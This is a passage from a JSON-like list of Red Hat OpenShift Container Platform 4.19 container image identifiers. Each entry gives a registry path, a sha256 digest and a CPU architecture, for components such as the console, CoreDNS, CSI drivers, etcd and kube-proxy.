"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
